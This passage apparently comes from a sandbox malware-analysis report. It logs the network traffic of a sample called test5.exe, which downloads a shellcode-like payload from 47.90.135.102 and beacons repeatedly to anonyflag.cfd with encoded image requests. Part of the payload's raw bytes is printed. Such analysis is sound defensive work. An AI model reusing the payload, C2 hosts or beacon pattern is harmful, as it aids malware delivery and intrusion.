Dec 28, 2024 11:37:56.725873947 CET	49926	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:56.726073980 CET	49926	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:56.726083040 CET	443	49926	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:56.726106882 CET	49926	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:56.726129055 CET	49926	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:56.835944891 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:56.835963011 CET	443	49931	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:56.836029053 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:56.836275101 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:56.836285114 CET	443	49931	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:58.143989086 CET	443	49931	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:58.144047022 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.144370079 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.144382954 CET	443	49931	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:58.145467043 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.145472050 CET	443	49931	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:58.651120901 CET	443	49931	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:58.651179075 CET	443	49931	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:58.651179075 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.651220083 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.651360035 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.651371002 CET	443	49931	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:58.651393890 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.651413918 CET	49931	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.758229017 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.758263111 CET	443	49937	104.21.34.5	192.168.2.4
Dec 28, 2024 11:37:58.758327961 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.758538961 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:37:58.758553028 CET	443	49937	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:00.025001049 CET	443	49937	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:00.025064945 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.025480986 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.025491953 CET	443	49937	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:00.026621103 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.026626110 CET	443	49937	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:00.520325899 CET	443	49937	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:00.520389080 CET	443	49937	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:00.520497084 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.520622015 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.520642042 CET	443	49937	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:00.520649910 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.520684958 CET	49937	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.633433104 CET	49941	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.633467913 CET	443	49941	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:00.633533955 CET	49941	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.633768082 CET	49941	443	192.168.2.4	104.21.34.5
Dec 28, 2024 11:38:00.633783102 CET	443	49941	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:01.890069008 CET	443	49941	104.21.34.5	192.168.2.4
Dec 28, 2024 11:38:01.890189886 CET	49941	443	192.168.2.4	104.21.34.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 11:36:00.501036882 CET	63267	53	192.168.2.4	1.1.1.1
Dec 28, 2024 11:36:00.903542995 CET	53	63267	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 11:36:00.501036882 CET	192.168.2.4	1.1.1.1	0x9de2	Standard query (0)	anonyflag.cfd	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 11:36:00.903542995 CET	1.1.1.1	192.168.2.4	0x9de2	No error (0)	anonyflag.cfd		104.21.34.5	A (IP address)	IN (0x0001)	false
Dec 28, 2024 11:36:00.903542995 CET	1.1.1.1	192.168.2.4	0x9de2	No error (0)	anonyflag.cfd		172.67.194.170	A (IP address)	IN (0x0001)	false
Dec 28, 2024 11:36:32.144622087 CET	1.1.1.1	192.168.2.4	0x50f8	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 28, 2024 11:36:32.144622087 CET	1.1.1.1	192.168.2.4	0x50f8	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

47.90.135.102

www.google.comhost:

anonyflag.cfd

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	47.90.135.102	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:35:59 UTC	185	OUT	GET /2Vcr HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS) Host: 47.90.135.102 Connection: Keep-Alive Cache-Control: no-cache
2024-12-28 10:35:59 UTC	208	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:35:59 GMT Content-Type: application/octet-stream Server: Apache Cache-Control: max-age=1 Connection: keep-alive X-Powered-By: Apache Content-Length: 296007
2024-12-28 10:35:59 UTC	8192	IN	Data Raw: fc 48 83 e4 f0 eb 33 5d 8b 45 00 48 83 c5 04 8b 4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55 00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 74 02 eb e7 58 fc 48 83 e4 f0 ff d0 e8 c8 ff ff ff 64 d3 d3 bc 64 57 d7 bc 29 89 92 ee 7c c1 1b 0b 34 40 f7 2b 34 40 f7 63 b9 5d 1d 9c 46 a2 55 15 99 ea d4 d6 3d 84 d5 d6 c2 57 94 6e 32 e2 36 38 5a e6 36 38 5a bc 7e b1 a3 43 ae b1 a3 43 ae b1 a3 43 ae b1 b3 42 ae b1 bd 5d 14 bf bd e9 1d 72 9c 51 1c 3e 51 70 48 56 38 03 68 26 4a 6c 0f 54 2b 01 2f 37 4a 6f 41 58 3e 4f 23 3d 1e 3d 56 53 3e 54 38 73 7a 1b 6b 53 17 74 0f 36 39 79 02 3c 1d 79 02 3c 1d 79 02 3c 99 a7 6c e3 59 18 6c 6f 99 a7 6c e3 59 18 6c 6f ff 49 a2 e3 3e f6 a2 6f dd a6 70 e3 85 19 70 6f db 06 b7 e3 1a b9 b7 6f 2b c0 78 e3 c2 7f 78 6f f3 06 b6 e3 ba b9 b6 6f Data Ascii: H3]EHM1HUU1U1H19tXHddW)\|4@+4@c]FU=Wn268Z68Z~CCCB]rQ>QpHV8h&JlT+/7JoAX>O#==VS>T8szkSt69y<y<y<lYlolYloI>oppoo+xxoo
2024-12-28 10:35:59 UTC	8192	IN	Data Raw: fd 65 61 40 fe 28 c9 43 2f 69 42 8c 6b 6a 80 4d a3 67 c4 7e 73 26 4f bf b2 ee 4d fb 81 3e 0c f0 48 7f 0f 00 09 f4 dc 41 2a 3a ef 96 6b b1 28 d7 48 70 0b 01 43 b8 4a 32 90 33 8c 76 93 e2 4d be 98 69 83 fb 9b b9 42 32 82 fd cf b1 45 82 96 0e 76 4a 1d c8 37 c1 c7 09 ff c7 f4 c1 be 4c 36 00 75 5a 35 4d d9 59 e4 8c 11 54 a5 07 d8 67 7d 46 d3 ad 39 45 11 ec 1a 8a 54 ef ea cb df 2d 61 1c ec fb 20 3f 3a 3a e8 3d 09 e2 db ea 48 69 1a ab 6b ab 11 63 2a 20 d7 60 f3 61 5c ae b2 62 84 eb 3f e1 77 e0 df 27 b6 28 d4 63 3d f3 15 aa 24 c0 dd eb af 06 9c 2a 64 10 5d e2 62 23 95 69 a1 20 d8 d9 a2 f1 99 52 68 fa 52 93 a0 f7 16 90 62 b3 25 48 23 90 ec 0d 20 68 67 ce e1 a0 65 8a d2 78 24 01 10 5b e7 0a d8 1a 6c cd 9c 19 b5 0c 54 12 f4 87 9b 57 f7 5f 5a 9e ee 6c 92 df 65 ab 53 Data Ascii: ea@(C/iBkjMg~s&OM>HA:k(HpCJ23vMiB2EvJ7L6uZ5MYTg}F9ET-a ?::=Hikc `a\b?w'(c=$*d]b#i RhRb%H# hgex$[lTW_ZleS
2024-12-28 10:35:59 UTC	8192	IN	Data Raw: 53 98 78 90 8f 11 25 a0 67 1f 3b a0 67 9a fb af e2 bb 04 50 1d f3 8f 15 f5 78 c2 c9 b9 f3 87 f1 f1 7e d2 c1 b3 f7 9e c1 a3 1f 67 ce a3 1f 8e df a1 1f 8e 54 6f 53 05 93 e4 80 4c 90 2d 09 11 a0 c5 5b 1f a0 c5 de df af 40 37 21 50 bf bc 2e 18 32 e9 1e f0 d5 f8 1e f0 3c 1f 1f f0 3c 94 d1 bc b7 53 5a 6f fe 50 93 e6 a3 60 7b a2 a9 60 7b 27 69 6f fe 98 97 90 01 d0 1a c5 31 98 91 0a d9 1c 9d 0a d9 f5 21 0b d9 f5 aa c5 95 7e 6d 4e 46 37 6e 87 cf 6a 5e 6f 02 65 5e 6f 87 a5 51 ea 87 a7 51 ea cf 2a 1c da 27 7a 10 da 27 ff d0 d5 a2 10 d1 d5 a2 f9 45 d4 a2 f9 ce 1a ee 72 09 91 3d 3b 0a 58 71 b6 47 84 f8 eb 77 6c 95 f7 77 6c 10 37 78 e9 70 c9 87 16 38 42 c2 fe 74 c9 87 c6 ff 9c 5b 84 76 c8 5b 94 3a 45 1e a4 72 ce d1 4c db dc d1 4c 32 91 d0 4c 32 1a 1a cf db 13 15 4b d3 Data Ascii: Sx%g;gPx~gToSL-[@7!P.2<<SZoP`{`{'io1!~mNF7nj^oe^oQQ*'z'Er=;XqGwlwl7xp8Bt[v[:ErLL2L2K
2024-12-28 10:35:59 UTC	8192	IN	Data Raw: 5c ee 73 bd 55 ee 73 bd 1d 65 bc 55 a2 00 bd 55 29 c6 56 50 91 d1 56 50 91 99 dd 0c b5 c9 95 87 d9 ed f5 cf 52 99 d1 a7 1a 1a 15 87 5b 45 54 d9 1a 18 15 85 45 db d9 06 3c c7 d9 73 32 44 a0 53 32 31 a8 94 30 3e a8 94 30 d5 ae 53 32 c6 ae 53 32 f5 6e 90 fe 39 a2 d8 77 65 86 d0 3f ec f2 f4 2f bb ba 77 c3 9b 31 0e cb 10 43 06 86 9b 93 4a 0d 41 db c1 d4 7a 25 b4 df 3b ac cc d7 d3 29 d4 d7 d3 c2 fc 3f f9 da fc 3f b4 51 3e bc 4c ae 4b b0 0d 27 39 b8 45 ac ea f1 ce 67 01 fb 8f ee 7b f3 c6 65 a8 bb 4d ae 40 d8 54 ae 40 90 df f2 64 a0 97 79 10 84 af 31 93 40 8f 6e 50 8c 43 a2 18 05 1f 86 10 4d 96 f2 34 5d c1 ba b7 b1 81 f2 3c 68 c9 7f 70 4c e9 36 fb b4 a1 bd 09 5c bf bb 09 5c 3a 7b 7c 6d 72 f6 28 49 52 be a3 82 ba 3b a6 82 ba 73 2b ce 9e 53 a0 16 1b 93 d5 04 57 18 Data Ascii: \sUseUU)VPVPR[ETE<s2DS210>0S2S2n9we?/w1CJAz%;)??Q>LK'9Eg{eM@T@dy1@nPCM4]<hpL6\\:{\|mr(IR;s+SW
2024-12-28 10:35:59 UTC	8192	IN	Data Raw: 50 99 86 0d 50 99 86 3e 90 d1 0d 62 b4 e1 45 e9 c0 c5 05 a1 43 01 25 fe 80 cd e9 b6 03 21 c1 f2 88 eb 29 d2 74 14 d6 9a ff 55 c6 a9 2d 14 47 48 d2 eb b8 47 96 62 b0 0f 1d 23 a0 36 0d 2c 35 f4 84 3d 7d 77 40 15 be 3f cb d1 f6 b6 93 d9 be 3f e3 c9 f6 b6 9b d1 a3 f7 cd 90 f4 bf 40 f8 4c f7 c1 14 7c f6 c1 14 34 75 a5 30 7c 75 ed bd 38 51 bd f1 b3 ab f5 78 f7 8f b5 30 7a ca 55 78 f1 3b 1d f1 b5 1f 25 b9 38 5a 95 f5 b5 17 15 bd 3c 53 31 8d 74 de 74 75 38 53 30 51 50 1b b9 15 74 33 f1 98 31 fb b9 15 64 63 f1 98 29 73 b9 11 6d 57 99 f9 dc ab 66 06 59 6b 69 83 53 6e 69 83 eb 38 3c d6 be 74 b1 93 46 3c 3a 5d b1 12 b1 a7 70 fd ae a4 8a b9 25 53 cf d2 d3 4f 8e 59 05 a7 ab 6b 05 a7 20 b3 80 67 2f 36 10 63 2f 36 58 ee 7a 86 10 65 b4 6e df 86 4b 91 54 5e ce 51 5b db b4 Data Ascii: PP>bEC%!)tU-GHGb#6,5=}w@??@L\|4u0\|u8Qx0zUx;%8Z<S1ttu8S0QPt31dc)smWfYkiSni8<tF<:]p%SOYk g/6c/6XzenKT^Q[
2024-12-28 10:35:59 UTC	8192	IN	Data Raw: bb e6 16 7b f6 9e fe 03 22 61 01 88 fa e4 c1 87 7f ce c4 87 7f 82 49 c2 67 ca c4 97 2f 82 49 da 1f 6a 14 0e e0 95 9f d6 65 55 90 53 6a 50 90 53 22 dd c4 77 52 95 49 3a 2a 7d dc ca d5 82 57 12 50 42 58 97 a7 46 58 97 eb cb 1c b3 9b 83 91 e6 73 cb 1c aa 57 bb f4 56 e8 44 0b dd 30 c1 cb d2 b5 1b cf d2 b5 53 42 86 91 23 0a 0b dd 07 7a e3 82 f7 85 1c 09 2f 00 dc 06 aa c1 d8 06 aa 8d 55 42 8e fd 1d cf db cd 55 42 97 e9 25 aa 51 56 da 55 da 8e 5f 95 d5 0b fb 91 d5 0b b3 1c 80 83 fb 91 cd e3 13 ba 3d 1c ec 31 e5 99 2c 3e 60 14 28 3e 60 58 a5 7b e8 10 28 2e e8 58 a5 63 60 b0 31 dc 9f 4f ba 04 1a 8f b5 81 68 8b b5 81 20 06 e0 09 68 8b ad 81 80 72 42 7e 7f f9 9a fb bf f6 1f a0 bb f6 1f ec 36 b3 97 a4 bb e6 df ec 36 ab 57 04 54 14 a8 fb df cc 2d 3b d0 49 6d 3f d0 49 Data Ascii: {"aIg/IjeUSjPS"wRI:*}WPBXFXsWVD0SB#z/UBUB%QVU_=1,>`(>`X{(.Xc`1Oh hrB~66WT-;Im?I
2024-12-28 10:36:00 UTC	8192	IN	Data Raw: 20 ad f7 3a e0 d9 f2 d2 87 37 f2 d2 3d 13 f2 d2 3d 98 39 3a 62 ba 39 3a e7 7a 4d 3f 0f 28 a3 3f 0f c0 6e 1d 0f c0 eb dd 7b c5 03 99 95 c5 03 20 90 c5 03 20 d4 4c 3e 2c e0 4f 3e c4 db 81 3e c4 60 85 3e c4 60 8a 89 04 eb 41 00 01 b4 e1 03 01 5c 17 ce 01 5c 9c 06 e9 ef 99 07 e9 a7 12 ff a1 22 d2 8a a4 ca d8 64 a4 ca 53 af 4c 11 9e af 4c 54 ad 66 04 df 62 23 89 9e 63 a8 59 d6 ea dc 7d f6 02 25 80 f6 02 ae 4b 1e bc 63 4b 1e f4 e8 84 95 24 00 e4 e2 24 00 dd d7 8e 33 de d7 81 b5 32 d6 81 b5 b9 62 a5 2d b9 62 a5 61 32 16 81 51 7e 9d fd 75 46 d5 76 39 62 95 3b b2 a6 1e ee 5a 0a c8 ee 5a 46 45 eb 2b 7c 47 eb 91 fc 47 eb 91 b0 cc 23 d8 3b 01 cb 31 33 00 cb 79 b8 4c ef 39 f5 c7 2b 0a 27 f4 c6 e2 a3 22 c6 e2 ef af c3 ab d5 ad c3 11 55 ad c3 11 19 26 0b 58 92 e9 e3 99 Data Ascii: :7==9:b9:zM?(?n{ L>,O>>`>`A\\"dSLLTfb#cY}%KcK$$32b-ba2Q~uFv9b;ZZFE+\|GG#;13yL9+'"U&X
2024-12-28 10:36:00 UTC	8192	IN	Data Raw: 6c d4 98 28 a6 9d 13 fe 4e 07 ff fe 4e 06 e2 2a ce 05 e2 af 23 71 ea e7 a8 be 02 e7 55 41 fd af de 1d d9 ff 96 96 b5 db ce de 3e af ea be 76 2c 2e 8e 37 73 6f d0 68 b0 a3 1c a4 f8 28 d8 f7 b0 a9 34 c7 b1 a9 34 f4 6a e5 b9 bc 7a a9 34 f8 5e 99 b9 ab 4d 5e f9 bb 4d 5f f9 bb 05 d6 a5 9f 25 29 b0 f6 3c 2b b0 73 fc 5f a4 3b 71 13 80 0b 99 04 71 0b 99 39 b9 0b 99 39 b6 9f 5a b2 75 d7 db 76 45 d6 db 76 1e 15 62 77 1e 15 62 9e 1c 15 62 9e d0 d9 2a 17 8c fd 22 5f 05 89 06 47 52 c1 87 ab 12 c7 87 ab 21 1c 0c 50 c9 f5 0c 50 c9 78 47 52 8c 4b 8e 17 bf 8b 05 c6 36 d7 21 ee bf 8b 05 ce 40 9e e5 d7 42 9e ad 5c b2 d6 2e a4 4d a3 29 97 8d 4a b7 97 8d 4a ff 1e d1 6e bf 56 58 32 9b 6e 10 bf 1f 4a 48 b9 1f 4a 00 30 5b 6e 30 78 d6 2a 14 28 93 19 dd 6d a0 d9 67 12 d4 dd 27 5a Data Ascii: l(NN#qUA>v,.7soh(44jz4^M^M_%)<+s_;qq99ZuvEvbwbb"_GR!PPxGRK6!@B\.M)JJnVX2nJHJ0[n0x*(mg'Z
2024-12-28 10:36:00 UTC	8192	IN	Data Raw: 72 73 7d a4 fb 2f 59 ac b3 a6 35 88 a3 ee bc fc 87 f6 eb b4 04 1a cb fc 8f 07 3a 9c 8c 07 09 63 07 f5 41 e8 ee bd c4 33 9a e3 fd 48 9e 95 f3 0c 15 53 bb 87 c0 1b 30 4c 28 b1 30 4c 28 f9 bb 17 38 b1 3e cc 4d 55 76 47 50 97 16 44 50 df 93 9f 24 e9 10 e4 20 e9 67 ff 68 62 24 ef 20 e9 ef a7 a5 16 9b bf ed 9f dc af 05 fd 19 af 05 b5 92 f0 15 5e 48 b8 9e a5 00 33 c5 b5 eb e2 8d 3c ee 6e ed 3f ee 86 aa fa ee 86 e2 71 b2 a2 d2 39 39 ce f6 01 71 45 82 25 31 0d 01 e1 11 52 c2 2d dd 1a 4b 71 f9 0a 1c 39 7a e6 3c ba 03 e2 3c f2 88 18 74 79 51 6f 50 f2 58 87 e9 67 59 87 53 63 59 87 53 2b d4 cb 77 1b 90 46 35 1e 19 02 11 2e e6 d5 59 a5 ad dd b1 2b 7a dd b1 63 f1 81 95 5b b9 02 51 7b e6 c1 9d b7 2a 89 16 73 62 00 4e 7b 2a 89 26 6b 62 00 56 73 2a 89 2e 53 6b df 66 d0 87 Data Ascii: rs}/Y5:cA3HS0L(0L(8>MUvGPDP$ ghb$ ^H3<n?q99qE%1R-Kq9z<<tyQoPXgYScYS+wF5.Y+zc[Q{sbN{&kbVs*.Skf
2024-12-28 10:36:00 UTC	8192	IN	Data Raw: 33 81 45 e7 00 53 0d 6e 4c 77 4d 26 c5 0b 69 1e 8d 82 1d 3a bd ca 96 f7 f5 43 ca d3 dd 0b 43 8f f9 2b bc 5f b1 12 20 7b 39 12 20 7b 36 87 e3 f0 f5 cb 6e ac d1 ab 27 27 8a bb 6e ac e1 a3 27 27 92 83 6e ac 71 dc ad 2c 08 c8 ad 64 83 81 a5 6b 07 0f a5 6b 07 e6 a4 6b 07 e6 68 23 8e ba 4c 2b c6 33 20 0f d6 7b a9 7b f2 63 fe 33 73 8f 0e 37 73 8f 46 bc 99 c7 cb e8 bd e7 82 63 4d af 09 9a 8a eb 2d ca 88 eb 3d ca 60 19 bd ca 60 2a 66 4f a0 5f 62 7c 60 b4 53 34 ed e0 77 14 a5 6b b8 5c 2c c7 9c fc 2c c7 9c b4 a5 73 b8 1c a5 73 b8 f4 8a f6 b8 f4 0f 36 cc 2f 47 bd 03 c7 e4 39 03 c7 67 c1 fc c8 f2 02 77 0b be 8f eb 2f 4e 8b eb 2f 07 00 b0 3f 4e 8b db 27 07 00 a8 07 4e 8b 4b 58 8d 47 87 10 04 1b a3 18 4c 92 d7 3c 5c c5 9f bd b0 35 9d bd b0 06 46 f5 3b f4 0e 7e c2 b9 8b Data Ascii: 3ESnLwM&i:CC+_ {9 {6n''n''nq,dkkkh#L+3 {{c3s7sFcM-=``*fO_b\|`S4wk\,,ss6/G9gw/N/?N'NKXGL<\5F;~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:02 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:02 UTC	867	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:02 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: MISS Last-Modified: Sat, 28 Dec 2024 10:36:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Puqh9crOxVvCUzqAHLGNY4utIG8sOQsMkgc0pqn7PPt1bG3mdvOl6OZPuQlkNcJJFEU9nFG8Gfhb5Mk2GqGqK5zSpB26zPjXCgsLAd1KVY1ovoV7nNiZk9JFNhamsZHK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e833c96ac358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1694&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1646926&cwnd=155&unsent_bytes=0&cid=3b13d462fa41a6ab&ts=546&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:04 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:04 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:04 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:04 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VQBdhpriZkJagJvQ6z2XqlmHDaQcq4nGUgKnimqxdCJyBrXQac91Zfa6ySniZsz4Q48xxEzdskAdDZU4ESyM%2BFxGEJCQ%2BRaRM71KEriBT%2BtD8Ikij8MzN%2F2gK6nGX6S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e8414c3480d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1439&rtt_var=589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1784841&cwnd=252&unsent_bytes=0&cid=b78e37806e9e791c&ts=756&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:06 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:06 UTC	882	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:06 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:06 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EK2RmQzmAho9EZSFag1XT85MIc96uDaQ%2B%2FdW6kWRno%2BJwGABssxZ3rN%2B0eFHJ9fQoUfqMubECOxJ1LW2xjBACfvyNVQZYXXF%2BiAd9g4nQWHHcODgiWvgvzvS%2Bfkz6GO5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e84e0b444308-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1746&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1672394&cwnd=228&unsent_bytes=0&cid=514c7e3d58babe45&ts=501&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:36:08 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:36:08 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:36:08 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:36:08 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYw7qYoEjiHmohMM4viZCz%2BmndmwEl1SNwtHYNyzveyN%2BAZYK0j19RR1KNOtURNlXjNBrTt3to3SZaqKTN0mtk5aZflT635rdmXh0HCuOYsPVQo053dAvIdqML%2BUnq2L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90e859bdeb4367-EWR alt-svc: h3=":443"; ma=86400 server-timing: 